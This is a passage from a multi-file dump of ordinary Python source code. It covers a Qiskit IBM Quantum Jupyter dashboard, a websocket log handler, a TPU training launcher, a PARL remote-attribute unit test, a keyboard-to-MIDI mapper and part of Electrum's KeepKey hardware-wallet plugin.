        self._jobs_labels = make_labels() # type: wid.HBox
        self.refresh_jobs_board()
    def _get_backends(self) -> None:
        """Get all the backends accessible with this account."""
        ibm_backends = {}
        for hgp in self.provider._get_hgps():
            hgp_name = "{hub}/{group}/{project}".format(
                hub=hgp.credentials.hub,
                group=hgp.credentials.group,
                project=hgp.credentials.project,
            )
            for backend in hgp.backends.values():
                # Simulators are excluded from the device list.
                if not backend.configuration().simulator:
                    if backend.name() not in ibm_backends:
                        ibm_backends[backend.name()] = BackendWithProviders(
                            backend=backend, providers=[hgp_name]
                        )
                    else:
                        # Same physical device reachable via another provider.
                        ibm_backends[backend.name()].providers.append(hgp_name)
        self.backend_dict = ibm_backends
    def refresh_jobs_board(self) -> None:
        """Refresh the job viewer."""
        if self.job_viewer is not None:
            # Newest jobs are shown first, below the button/label header.
            self.job_viewer.children = [
                self._clear_jobs_button,
                self._jobs_labels,
            ] + list(reversed(self.jobs))
    def refresh_device_list(self) -> None:
        """Refresh the list of devices."""
        for _wid in self.dashboard._device_list.children:
            _wid.close()
        self.dashboard._device_list.children = []
        # Each device pane is built in its own thread to keep the UI responsive.
        for back in self.backend_dict.values():
            _thread = threading.Thread(
                target=_add_device_to_list, args=(back, self.dashboard._device_list)
            )
            _thread.start()
    def start_dashboard(self, provider: IBMProvider) -> None:
        """Starts the dashboard."""
        self.provider = provider
        self.dashboard = build_dashboard_widget()
        self.job_viewer = self.dashboard.children[0].children[1]
        self._get_backends()
        self.refresh_device_list()
        # Background thread that periodically refreshes device info; it is
        # stopped via the cooperative ``do_run`` flag in stop_dashboard().
        self.dashboard._thread = threading.Thread(
            target=update_backend_info, args=(self.dashboard._device_list,)
        )
        self.dashboard._thread.do_run = True
        self.dashboard._thread.start()
        self.refresh_jobs_board()
    def stop_dashboard(self) -> None:
        """Stops the dashboard."""
        if self.dashboard:
            self.dashboard._thread.do_run = False
            self.dashboard._thread.join()
            self.dashboard.close()
        self.dashboard = None
    def update_single_job(self, update_info: Tuple) -> None:
        """Update a single job instance.
        Args:
            update_info: Updated job info containing job ID,
                status string, est time, and status value.
        """
        job_id = update_info[0]
        found_job = False
        ind = None
        for idx, job in enumerate(self.jobs):
            if job.job_id == job_id:
                found_job = True
                ind = idx
                break
        if found_job:
            job_wid = self.jobs[ind]
            # update status
            if update_info[1] == "DONE":
                stat = "<font style='color:#34BC6E'>{}</font>".format(update_info[1])
            elif update_info[1] == "ERROR":
                stat = "<font style='color:#DC267F'>{}</font>".format(update_info[1])
            elif update_info[1] == "CANCELLED":
                stat = "<font style='color:#FFB000'>{}</font>".format(update_info[1])
            else:
                stat = update_info[1]
            job_wid.children[3].value = stat
            # update estimated start time.
            if update_info[2] == 0:
                est_start = "-"
            else:
                est_start = str(update_info[2])
            job_wid.children[4].value = est_start
    def cancel_job(self, job_id: str) -> None:
        """Cancel a job in the watcher.
        Args:
            job_id: ID of the job to cancel.
        Raises:
            Exception: If job ID is not found.
        """
        do_pop = False
        ind = None
        for idx, job in enumerate(self.jobs):
            if job.job_id == job_id:
                do_pop = True
                ind = idx
                break
        if not do_pop:
            raise Exception("Job is not found.")
        # Only attempt cancellation for jobs still in flight.
        if self.jobs[ind].children[3].value not in ["CANCELLED", "DONE", "ERROR"]:
            try:
                self.jobs[ind].job.cancel()
                status = self.jobs[ind].job.status()
            except IBMJobApiError:
                # Best-effort: the server may already have finalized the job.
                pass
            else:
                self.update_single_job(
                    (self.jobs[ind].job_id, status.name, 0, status.value)
                )
    def clear_done(self) -> None:
        """Clear the done jobs from the list."""
        _temp_jobs = []
        do_refresh = False
        for job in self.jobs:
            job_str = job.children[3].value
            if not (
                ("DONE" in job_str) or ("CANCELLED" in job_str) or ("ERROR" in job_str)
            ):
                _temp_jobs.append(job)
            else:
                job.close()
                do_refresh = True
        if do_refresh:
            self.jobs = _temp_jobs
            self.refresh_jobs_board()
    def _init_subscriber(self) -> None:
        """Initializes a subscriber that listens to job start events."""
        def _add_job(job: IBMJob) -> None:
            """Callback function when a job start event is received.
            When a job starts, this function creates a job widget and adds
            the widget to the list of jobs the dashboard keeps tracking.
            Args:
                job: Job to start watching.
            """
            status = job.status()
            queue_info = job.queue_info()
            position = queue_info.position if queue_info else None
            est_time = queue_info.estimated_start_time if queue_info else None
            job_widget = create_job_widget(
                self, job, job.backend().name(), status.name, position, est_time
            )
            self.jobs.append(job_widget)
            _job_monitor(job, status, self)
            # Cap the tracked-job list; clear_done() refreshes the board itself.
            if len(self.jobs) > 50:
                self.clear_done()
            else:
                self.refresh_jobs_board()
        self.subscribe("ibm.job.start", _add_job)
def build_dashboard_widget() -> AccordionWithThread:
    """Build the dashboard widget.

    Assembles a two-tab (Devices / Jobs) accordion, displays it hidden,
    re-parents it into the notebook header via injected Javascript, then
    makes it visible.

    Returns:
        Dashboard widget.
    """
    tabs = wid.Tab(layout=wid.Layout(width="760px", max_height="650px"))
    devices = wid.VBox(children=[], layout=wid.Layout(width="740px", height="100%"))
    device_list = wid.Box(
        children=[devices], layout=wid.Layout(width="auto", max_height="600px")
    )
    jobs_box = wid.VBox(
        layout=wid.Layout(
            max_width="740px", min_width="740px", justify_content="flex-start"
        )
    )
    tabs.children = [device_list, jobs_box]
    tabs.set_title(0, "Devices")
    tabs.set_title(1, "Jobs")
    acc = AccordionWithThread(
        children=[tabs],
        layout=wid.Layout(
            width="auto",
            max_height="700px",
        ),
    )
    # acc -> tabs -> device_list Box -> devices VBox.
    acc._device_list = acc.children[0].children[0].children[0]
    acc.set_title(0, "IBM Quantum Dashboard")
    acc.selected_index = None
    # Hidden while the Javascript below moves it into the page header.
    acc.layout.visibility = "hidden"
    display(acc)
    acc._dom_classes = ["job_widget"]
    display(
        Javascript(
            """$('div.job_widget')
        .detach()
        .appendTo($('#header'))
        .css({
            'z-index': 999,
             'position': 'fixed',
            'box-shadow': '5px 5px 5px -3px black',
            'opacity': 0.95,
            'float': 'left,'
        })
        """
        )
    )
    acc.layout.visibility = "visible"
    return acc
@magics_class
class IBMDashboardMagic(Magics):
    """A class for enabling/disabling the IBM Quantum dashboard."""
    @line_magic
    def ibm_quantum_dashboard(self, line="", cell=None) -> None:
        """A Jupyter magic function to enable the dashboard.

        Raises:
            QiskitError: if the IBM Quantum account could not be loaded.
        """
        # pylint: disable=unused-argument
        try:
            provider = IBMProvider()
        except Exception as ex:
            # Chain the original exception so the root cause is not lost.
            raise QiskitError("Could not load IBM Quantum account from the local file.") from ex
        _IBM_DASHBOARD.stop_dashboard()
        _IBM_DASHBOARD.start_dashboard(provider)
    @line_magic
    def disable_ibm_quantum_dashboard(self, line="", cell=None) -> None:
        """A Jupyter magic function to disable the dashboard."""
        # pylint: disable=unused-argument
        _IBM_DASHBOARD.stop_dashboard()
# Module-level singleton shared by the enable/disable magics above.
_IBM_DASHBOARD = IBMDashboard()
"""The Jupyter IBM Quantum dashboard instance."""
|
websocket.py
|
import json
import multiprocessing
import threading
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse
from spectrum.conf import SPECTRUM_UUID4
from spectrum.handlers.base import BaseSpectrumHandler
from autobahn.asyncio.websocket import WebSocketClientProtocol
from autobahn.asyncio.websocket import WebSocketClientFactory
try:
import asyncio
except ImportError:
# Trollius >= 0.3 was renamed
import trollius as asyncio
# Module-level singletons shared between the handler, the worker thread and
# the websocket protocol: the message queue, the asyncio loop and the factory.
queue = multiprocessing.Queue()
loop = asyncio.get_event_loop()
factory = WebSocketClientFactory()
def listener(queue, proto):
    """Forward queued payloads to the websocket until it disconnects.

    Runs in a separate process started from SpectrumProtocol.onOpen().
    """
    while proto.connected:
        message = queue.get()
        if message is not None:
            proto.sendMessage(message, isBinary=False)
class SpectrumProtocol(WebSocketClientProtocol):
    """Client protocol that drains the module-level queue into the socket."""
    # Safe default in case the connection closes before onConnect fires.
    connected = False
    def onOpen(self):
        """Start the listener process once the websocket handshake completes."""
        self.listener = multiprocessing.Process(target=listener, args=(queue, self,))
        self.listener.start()
        # NOTE(review): joining here blocks until the listener process exits;
        # kept as-is since the surrounding code may rely on that.
        self.listener.join()
    def onConnect(self, response):
        self.connected = True
        print("Connected to Server: {}".format(response.peer))
    def onClose(self, wasClean, code, reason):
        # BUG FIX: autobahn invokes onClose(wasClean, code, reason); the old
        # zero-argument signature raised a TypeError on every disconnect.
        self.connected = False
def worker(loop, hostname, port):
    """Run the websocket client connection on *loop* in the current thread."""
    factory.protocol = SpectrumProtocol
    # This worker runs in its own thread, so it must claim the loop first.
    asyncio.set_event_loop(loop)
    coro = loop.create_connection(factory, hostname, port)
    try:
        loop.run_until_complete(coro)
        loop.close()
    except RuntimeError:
        # Loop already running/closed elsewhere; treat as best-effort.
        pass
class WebsocketSpectrum(BaseSpectrumHandler):
    """Log handler that ships records as JSON over a websocket."""
    def __init__(self, sublevel=None, *args, **kwargs):
        """ Setup """
        self.url = kwargs.pop('url', 'ws://127.0.0.1:9200/?spectrum=%s' % SPECTRUM_UUID4)
        self.conn_info = urlparse(self.url)
        # Spin up the websocket worker before the base handler is initialized.
        self.start(self.conn_info.hostname, self.conn_info.port)
        super(WebsocketSpectrum, self).__init__(sublevel, *args, **kwargs)
    def emit(self, record):
        """Serialize *record* and enqueue it for the websocket listener."""
        data = self.build_message(record)
        payload = json.dumps(data, ensure_ascii=False).encode('utf8')
        queue.put(payload)
    def start(self, hostname, port):
        """Spawn the background thread that owns the websocket connection.

        BUG FIX: the first parameter was previously named ``cls`` although
        no ``@classmethod`` decorator was applied and the method is always
        called on an instance; renamed to ``self`` for clarity.
        """
        try:
            t = threading.Thread(target=worker, args=(loop, hostname, port,))
            t.start()
        except RuntimeError:
            pass
|
run_experiment.py
|
import atexit
import sacred
import argparse
import time
import math
import subprocess
import shutil
import os
import json
import threading
import requests
import glob
from configs import fetch_model_params
import socket
import subprocess
import queue
import sys
import signal
# Command-line interface and experiment bookkeeping (sacred + mongo observer).
parser = argparse.ArgumentParser()
parser.add_argument('--tpu', type=str, required=True) # Name of TPU to train on, if any
parser.add_argument('--model', type=str, required=True) # JSON file that contains model parameters
parser.add_argument('--experiment_name', type=str, required=True) # name of experiment (will show up in omniboard)
parser.add_argument('--steps_per_checkpoint', type=int, default=5000)
parser.add_argument('--autostack', action="store_false")
parser.add_argument('--auto_layout', action="store_true")
parser.add_argument('--auto_layout_and_mesh_shape', action="store_true")
parser.add_argument('--new', action='store_true')
parser.add_argument('--test', action='store_true')
parser.add_argument('--eval', action='store_true')
parser.add_argument('--predict', action='store_true')
parser.add_argument('--no_delete_tpu', action='store_true')
parser.add_argument('--heartbeat_timeout', type=int, default=36000) # kill and restart if nothing logged to tensorboard in this many seconds
args = parser.parse_args()
params = fetch_model_params(args.model)
ex = sacred.Experiment(args.experiment_name)
ex.observers.append(sacred.observers.QueuedMongoObserver(url='127.0.0.1:27017', db_name='db', username='user', password='password'))
def get_open_port(lo=8000, hi=8100):
    """Return the first TCP port in ``[lo, hi)`` that nothing is listening on.

    Args:
        lo: inclusive lower bound of the scan range.
        hi: exclusive upper bound of the scan range.

    Returns:
        The first free port number.

    Raises:
        RuntimeError: if every port in the range is in use. (The previous
            implementation silently returned ``None`` here, which surfaced
            later as a confusing TypeError.)
    """
    for port in range(lo, hi):
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            # connect_ex returns a non-zero errno when nothing is listening.
            if s.connect_ex(('localhost', port)) != 0:
                return port
    raise RuntimeError('no open port found in range [{}, {})'.format(lo, hi))
def train_thread(args, tpu, id, q):
    """Run one training subprocess on *tpu*, supervising it via queue *q*.

    Launches ``main.py``, polls it once a minute, and honors a ``('kill',)``
    message from the logging thread by terminating (then killing) the child
    and recreating the TPU. Exits the whole process via SIGINT on a clean
    child exit.
    """
    print('starting training on', tpu)
    # pass binary flags through
    opts = ''
    for flag in ['auto_layout', 'auto_layout_and_mesh_shape', 'new', 'test', 'predict', 'eval', ]:
        if args.__getattribute__(flag):
            opts += ' --' + flag
    # store_false flags: forward them only when they were explicitly disabled.
    for flag in ['autostack', ]:
        if not args.__getattribute__(flag):
            opts += ' --' + flag
    cmd = "python3 main.py --tpu {tpu} --model run_configs/config_{id}.json --steps_per_checkpoint {steps_per_checkpoint} {opts} --sacred_id {run_id}".format(tpu=tpu, id=id, steps_per_checkpoint=args.steps_per_checkpoint, opts=opts, run_id=id)
    print('Running:', cmd)
    proc = subprocess.Popen(cmd, shell=True)
    # poll until it's exited
    while proc.poll() is None:
        time.sleep(60)
        try:
            nq, *nargs = q.get_nowait()
            if nq == 'kill':
                print('train thread recieved kill signal from logging thread')
                # first send SIGTERM
                proc.terminate()
                time.sleep(60)
                # if it still hasn't exited, we send SIGKILL
                if proc.poll() is None:
                    print('SIGTERM not successful, sending SIGKILL')
                    proc.kill()
        except queue.Empty:
            pass
    print('exited training!')
    if proc.returncode == 0:
        print('exited gracefully')
        # Interrupt the main (logging) thread so the whole run shuts down.
        os.kill(os.getpid(), signal.SIGINT)
        return
    if args.no_delete_tpu:
        print('recreate done, exiting train_thread - not killing tpu!')
        return
    print("Recreating {} in 60sec...".format(tpu))
    time.sleep(60)
    os.system("pu recreate {} --yes --retry 3600 --retry-randomness 1.5".format(tpu))
    print('recreate done, exiting train_thread')
    # clear out queue
    while True:
        try:
            q.get_nowait()
            print('dropped request in queue after pu recreate')
        except queue.Empty:
            break
def get_json(uri, params=None, timeout=15):
    """GET *uri* and return the decoded JSON body, raising on HTTP errors."""
    response = requests.get(uri, params=params, timeout=timeout)
    response.raise_for_status()
    return response.json()
def get_tag_sets(base_uri):
    """Map each tensorboard run name to the scalar tags it exposes."""
    payload = get_json(f'{base_uri}/data/plugin/scalars/tags', {'experiment': ''})
    assert isinstance(payload, dict)
    result = {}
    for run_name, tags in payload.items():
        result[run_name] = tags.keys()
    return result
def get_scalar_data(base_uri, run, tag):
    """Fetch the (wall_time, step, value) triples for one run/tag pair."""
    query = {'experiment': '', 'run': run, 'tag': tag}
    data = get_json(f'{base_uri}/data/plugin/scalars/scalars', query)
    assert isinstance(data, list)
    return data
def get_run_data(port):
    """Scrape loss/eval metrics from the local tensorboard on *port*.

    Returns:
        Dict possibly containing ``loss``, ``val_loss``, ``lambada_acc`` and
        ``lambada_ppl``; scrape failures yield a partial (possibly empty)
        dict rather than raising.
    """
    import traceback
    base_uri = f'http://localhost:{port}/'
    r = {}
    try:
        tag_sets = get_tag_sets(base_uri)
        runs = tag_sets.keys()
        if '.' in runs:
            if 'loss' in tag_sets['.']:
                r['loss'] = get_scalar_data(base_uri, '.', 'loss')
        if 'eval' in runs:
            if 'loss' in tag_sets['eval']:
                r['val_loss'] = get_scalar_data(base_uri, 'eval', 'loss')
        if 'eval_lambada' in runs:
            if 'lambada_acc' in tag_sets['eval_lambada']:
                r['lambada_acc'] = get_scalar_data(base_uri, 'eval_lambada', 'lambada_acc')
            if 'lambada_log_ppl' in tag_sets['eval_lambada']:
                # Convert log-perplexity to perplexity for logging.
                r['lambada_ppl'] = [
                    [t, s, math.exp(lp)]
                    for [t, s, lp] in get_scalar_data(base_uri, 'eval_lambada', 'lambada_log_ppl')
                ]
    except Exception:
        # BUG FIX: was a bare ``except:``, which also swallowed
        # KeyboardInterrupt/SystemExit; best-effort logging is preserved.
        traceback.print_exc()
    return r
@ex.main
def main(_run):
    """Sacred entry point: launch training and mirror metrics into sacred.

    Starts tensorboard in a screen session, runs the training subprocess in a
    thread, and polls tensorboard / prediction files / eval jsonl once a
    minute, restarting the run when nothing new has been logged for
    ``--heartbeat_timeout`` seconds.
    """
    print('Starting run', _run._id)
    print('experiment main invoked with argv:', " ".join(sys.argv))
    print('WARNING: please remember to remove old metric log files from the model directory.')
    os.makedirs('run_configs', exist_ok=True)
    shutil.copy(args.model if args.model.endswith('.json') else 'configs/{}.json'.format(args.model), 'run_configs/config_{}.json'.format(_run._id))
    tensorboard_port = get_open_port()
    print('Tensorboard at port:', tensorboard_port)
    print('Tensorboard url: ', 'http://eleutherai.bmk.sh:'+ str(tensorboard_port))
    os.system("screen -S tensorboard_{} -d -m bash -c 'tensorboard --logdir {} --port {} --bind_all --reload_multifile=true || tensorboard --logdir {} --port {} --reload_multifile=true'".format(_run._id, params["model_path"], tensorboard_port,params["model_path"], tensorboard_port,))
    atexit.register(goodbye, _run._id)
    # Highest step already logged, per metric key; avoids duplicate logging.
    curr_step = {}
    seen_predictions = set()
    while True:
        last_tb_log_time = time.time()
        q = queue.Queue()
        trainthd = threading.Thread(target=train_thread, args=(args, args.tpu, _run._id, q))
        trainthd.start()
        while trainthd.is_alive():
            time.sleep(60)
            print('Polling tensorboard for metrics...')
            data = get_run_data(tensorboard_port)
            for k in data.keys():
                for ts, step, val in data[k]:
                    if step <= curr_step.get(k, -1):
                        continue
                    _run.log_scalar(k, val, step)
                    if k == 'loss':
                        _run.log_scalar('tb_ts', ts, step)
                        print('Logged to sacred: step={},loss={},tb_ts={}'.format(step, val, ts))
                    # found something new, so logging!
                    last_tb_log_time = time.time()
                    curr_step[k] = step
            for f in glob.glob('predictions_{}_*'.format(_run._id)):
                if f in seen_predictions:
                    continue
                print('collecting prediction file', f)
                ex.add_artifact(f)
                seen_predictions.add(f)
            # collect eval metrics from jsonl
            if os.path.exists(f'eval_{_run._id}.jsonl'):
                with open(f'eval_{_run._id}.jsonl') as fh:
                    for line in fh:
                        ob = json.loads(line)
                        val_step = ob['global_step']
                        val_task = ob['task']
                        for metr in ob.keys():
                            k = 'fs.' + val_task + '.' + metr
                            if metr in ['task', 'global_step']: continue
                            if val_step <= curr_step.get(k, -1): continue
                            _run.log_scalar(k, ob[metr], val_step)
                            curr_step[k] = val_step
            if time.time() - last_tb_log_time > args.heartbeat_timeout:
                # the run hasn't logged in a while, so we restart it
                q.put(('kill',))
                # give training thread some time to do its thing and recreate tpu
                while trainthd.is_alive():
                    print('logging thread waiting for killing stalled run and for tpu recreate to finish')
                    time.sleep(60)
        if args.no_delete_tpu:
            break
def goodbye(id):
    """atexit hook: print a farewell and tear down the tensorboard screen."""
    for farewell in ("You are now leaving the Python sector.",
                     "Sie verlassen den pythonischen Sektor."):
        print(farewell)
    os.system("screen -S tensorboard_{} -X quit".format(id))
if __name__ == '__main__':
    # Register all python source files with sacred for reproducibility.
    for file in glob.glob("**/*", recursive=True):
        if file.split('.')[-1] in ['py']:
            print('Adding', file, 'to sacred')
            ex.add_source_file(file)
    ex.add_config({
        'tpu_name': args.tpu,
        **params
    })
    ex.run()
|
get_set_attribute_test.py
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import parl
import numpy as np
import time
import threading
import random
from parl.remote.client import disconnect
from parl.utils import logger
from parl.remote.master import Master
from parl.remote.worker import Worker
from parl.utils import get_free_tcp_port
@parl.remote_class
class Actor(object):
    """Remote actor used to exercise attribute get/set over parl RPC."""
    def __init__(self, arg1, arg2, arg3, arg4):
        self.arg1 = arg1
        self.arg2 = arg2
        self.arg3 = arg3
        self.GLOBAL_CLIENT = arg4
    # NOTE: this method shares its name with the instance attribute set in
    # __init__; on instances the attribute shadows the method (intentional
    # for the attribute-access tests below).
    def arg1(self, x, y):
        time.sleep(0.2)
        return x + y
    def arg5(self):
        return 100
    def set_new_attr(self):
        # Attribute created only after this call; exercises dynamic attributes.
        self.new_attr_1 = 200
class Test_get_and_set_attribute(unittest.TestCase):
    """End-to-end tests for remote attribute access through a parl cluster."""
    def tearDown(self):
        # Drop the client connection between tests.
        disconnect()
    def test_get_attribute(self):
        """Attributes set in __init__ are readable through the remote proxy."""
        port = get_free_tcp_port()
        logger.info("running:test_get_attirbute")
        master = Master(port=port)
        th = threading.Thread(target=master.run)
        th.start()
        # Give the master time to come up before attaching a worker.
        time.sleep(3)
        worker1 = Worker('localhost:{}'.format(port), 1)
        arg1 = np.random.randint(100)
        arg2 = np.random.randn()
        arg3 = np.random.randn(3, 3)
        arg4 = 100
        parl.connect('localhost:{}'.format(port))
        actor = Actor(arg1, arg2, arg3, arg4)
        self.assertTrue(arg1 == actor.arg1)
        self.assertTrue(arg2 == actor.arg2)
        self.assertTrue((arg3 == actor.arg3).all())
        self.assertTrue(arg4 == actor.GLOBAL_CLIENT)
        master.exit()
        worker1.exit()
    def test_set_attribute(self):
        """Attributes written through the proxy round-trip correctly."""
        port = get_free_tcp_port()
        logger.info("running:test_set_attirbute")
        master = Master(port=port)
        th = threading.Thread(target=master.run)
        th.start()
        time.sleep(3)
        worker1 = Worker('localhost:{}'.format(port), 1)
        arg1 = 3
        arg2 = 3.5
        arg3 = np.random.randn(3, 3)
        arg4 = 100
        parl.connect('localhost:{}'.format(port))
        actor = Actor(arg1, arg2, arg3, arg4)
        actor.arg1 = arg1
        actor.arg2 = arg2
        actor.arg3 = arg3
        actor.GLOBAL_CLIENT = arg4
        self.assertTrue(arg1 == actor.arg1)
        self.assertTrue(arg2 == actor.arg2)
        self.assertTrue((arg3 == actor.arg3).all())
        self.assertTrue(arg4 == actor.GLOBAL_CLIENT)
        master.exit()
        worker1.exit()
# Standard unittest entry point.
if __name__ == '__main__':
    unittest.main()
|
KeyMidiMapper.py
|
import time
import csv
from distutils.util import strtobool #文字列→bool型変換で使用
import threading
#外部ライブラリ
import rtmidi
from pyhooked import Hook, KeyboardEvent, MouseEvent
#自作ライブラリ
import KeyMidiGui as kmGui
class MapData():
    """Keyboard-to-MIDI-CC mapping table plus the current CC values."""
    def __init__(self):
        # List of mapping dicts (key, channel, CCNumber, modifiers, method, value).
        self.mapData = []
        # Current CC value per packed (channel, CCNumber) key; see calcCCkey().
        self.valData = {}
        # Timestamp of the previously handled event, used for repeat acceleration.
        self.ptime = time.time()
    def addMap(self, key, channel, CCNumber, shift=False, ctrl=False, alt=False ,method='set', value=63):
        """Register one key-to-CC mapping; seeds the CC's initial value once."""
        self.mapData.append({
            'key':key,
            'channel':channel,
            'CCNumber':CCNumber,
            'shift':shift,
            'ctrl':ctrl,
            'alt':alt,
            'method':method,
            'value': value
        })
        cc_key = self.calcCCkey(channel, CCNumber)
        if cc_key not in self.valData:
            self.valData.update({cc_key:value})
    def readMapData(self, filePass):
        # Unimplemented stub; mappings are loaded by the caller instead.
        return None
    def calc_interval(self):
        """Return an acceleration factor: faster key repeats give larger steps."""
        ntime = time.time()
        sub = ntime - self.ptime
        self.ptime = ntime
        # 0.020s guard keeps the denominator positive for very fast repeats.
        return 1.0 + 0.25/max(0.0001,(sub-0.020))
    def calcCCkey(self, channel, CCNumber):
        """Pack (channel, CC number) into a single integer dict key."""
        return (channel << 8) + CCNumber
    def checkHandleEvent(self, args):
        """Translate a key-down event into a MIDI CC message.

        Returns a ``[status, cc_number, value]`` list for the first matching
        mapping (key plus exact shift/ctrl/alt state), or None.
        """
        if args.event_type != 'key down':
            return None
        for data in self.mapData:
            if(data['key'] != args.current_key):
                continue
            if(data['shift'] != ('Lshift' in args.pressed_key or 'Rshift' in args.pressed_key)):
                continue
            if(data['ctrl'] != ('Lctrl' in args.pressed_key or 'Rctrl' in args.pressed_key)):
                continue
            if(data['alt'] != ('Lalt' in args.pressed_key or 'Ralt' in args.pressed_key)):
                continue
            cc_key = self.calcCCkey(data['channel'], data['CCNumber'])
            # 0xB0 is the MIDI Control Change status byte for channel 0.
            ch = 0xB0 + data['channel']
            if(data['method'] == 'inc'):
                self.valData[cc_key] += int(data['value']*self.calc_interval())
                self.valData[cc_key] = min(127,self.valData[cc_key])
            elif(data['method'] == 'dec'):
                self.valData[cc_key] -= int(data['value']*self.calc_interval())
                self.valData[cc_key] = max(0, self.valData[cc_key])
            elif(data['method'] == 'set'):
                self.valData[cc_key] = data['value']
            return [ch, data['CCNumber'], self.valData[cc_key]]
        return None
class KeyMapper():
    """Glue object: loads the mapping CSV, owns the GUI and the MIDI port."""
    def __init__(self):
        self.mapdata = MapData()
        self.myGui = kmGui.mainGui()
        # Set up rtmidi.
        self.midiout = rtmidi.MidiOut()
        self.available_ports = self.midiout.get_ports()
        self.myGui.setup(self.available_ports, self.midiout)
        if self.available_ports:
            # NOTE(review): hard-coded port index 1 — confirm this matches
            # the intended output device.
            self.midiout.open_port(1)
        else:
            self.midiout.open_virtual_port("My virtual output")
        # Load the mapping configuration file (CSV, header row skipped).
        filePass = self.myGui.getFilePass()
        if(filePass == ""):
            return
        with open(filePass) as f:
            reader = csv.reader(f)
            rowList = [row for row in reader]
        for l in rowList[1:]:
            self.mapdata.addMap(
                l[0],
                int(l[1]),
                int(l[2]),
                strtobool(l[3]),
                strtobool(l[4]),
                strtobool(l[5]),
                l[6],
                int(l[7])
            )
        # GUI loop (started separately via guiLoop()).
        #self.myGui.guiLoop()
    def __del__(self):
        # Explicitly release the MIDI output on disposal.
        del self.midiout
    def guiLoop(self):
        """Run the (blocking) GUI main loop."""
        self.myGui.run()
        return
    def handle_events(self,args):
        """Keyboard-hook callback: send a MIDI message for mapped keys."""
        if isinstance(args, KeyboardEvent):
            map_event = self.mapdata.checkHandleEvent(args)
            if(map_event != None):
                self.midiout.send_message(map_event)
if __name__ == "__main__":
    mapper = KeyMapper()
    hk = Hook()  # create the keyboard hook instance
    hk.handler = mapper.handle_events  # register the callback as the hook handler
    # Thread.setDaemon() is deprecated (removed in Python 3.13); use the
    # daemon keyword instead.
    thread_1 = threading.Thread(target=hk.hook, daemon=True)
    thread_1.start()
    mapper.guiLoop()
|
keepkey.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum.util import bfh, bh2u, UserCancelled, UserFacingException
from electrum.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum.bip32 import deserialize_xpub
from electrum import constants
from electrum.i18n import _
from electrum.transaction import deserialize, Transaction
from electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKey_KeyStore(Hardware_KeyStore):
    """Hardware keystore backed by a KeepKey device."""
    hw_type = 'keepkey'
    device = 'KeepKey'
    def get_derivation(self):
        # BIP32 derivation path prefix for this keystore.
        return self.derivation
    def get_client(self, force_pair=True):
        return self.plugin.get_client(self, force_pair)
    def decrypt_message(self, sequence, message, password):
        """Not supported by KeepKey; always raises."""
        raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
    def sign_message(self, sequence, message, password):
        """Sign *message* on-device with the key at derivation/<change>/<index>."""
        client = self.get_client()
        address_path = self.get_derivation() + "/%d/%d"%sequence
        address_n = client.expand_path(address_path)
        msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
        return msg_sig.signature
    def sign_transaction(self, tx, password):
        """Collect previous txs and xpub paths, then sign *tx* on-device."""
        if tx.is_complete():
            return
        # previous transactions used as inputs
        prev_tx = {}
        # path of the xpubs that are involved
        xpub_path = {}
        for txin in tx.inputs():
            pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
            tx_hash = txin['prevout_hash']
            # Legacy inputs need the full previous tx for on-device verification.
            if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
                raise UserFacingException(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
            prev_tx[tx_hash] = txin['prev_tx']
            for x_pubkey in x_pubkeys:
                if not is_xpubkey(x_pubkey):
                    continue
                xpub, s = parse_xpubkey(x_pubkey)
                if xpub == self.get_master_public_key():
                    xpub_path[xpub] = self.get_derivation()
        self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class KeepKeyPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
firmware_URL = 'https://www.keepkey.com'
libraries_URL = 'https://github.com/keepkey/python-keepkey'
minimum_firmware = (1, 0, 0)
keystore_class = KeepKey_KeyStore
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
    def __init__(self, parent, config, name):
        """Load the keepkeylib dependencies; mark them unavailable on failure."""
        HW_PluginBase.__init__(self, parent, config, name)
        try:
            from . import client
            import keepkeylib
            import keepkeylib.ckd_public
            import keepkeylib.transport_hid
            self.client_class = client.KeepKeyClient
            self.ckd_public = keepkeylib.ckd_public
            self.types = keepkeylib.client.types
            self.DEVICE_IDS = keepkeylib.transport_hid.DEVICE_IDS
            self.device_manager().register_devices(self.DEVICE_IDS)
            self.libraries_available = True
        except ImportError:
            # python-keepkey not installed; the plugin stays disabled.
            self.libraries_available = False
    def hid_transport(self, pair):
        """Create a HID transport for the given (path, path) pair."""
        from keepkeylib.transport_hid import HidTransport
        return HidTransport(pair)
    def _try_hid(self, device):
        """Try to open *device* over USB HID; return the transport or None."""
        self.print_error("Trying to connect over USB...")
        # Interface 1 is the debug-link interface; order the pair accordingly.
        if device.interface_number == 1:
            pair = [None, device.path]
        else:
            pair = [device.path, None]
        try:
            return self.hid_transport(pair)
        except BaseException as e:
            # see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
            # raise
            self.print_error("cannot connect at", device.path, str(e))
            return None
    def create_client(self, device, handler):
        """Connect to *device*, sanity-check it and verify its firmware.

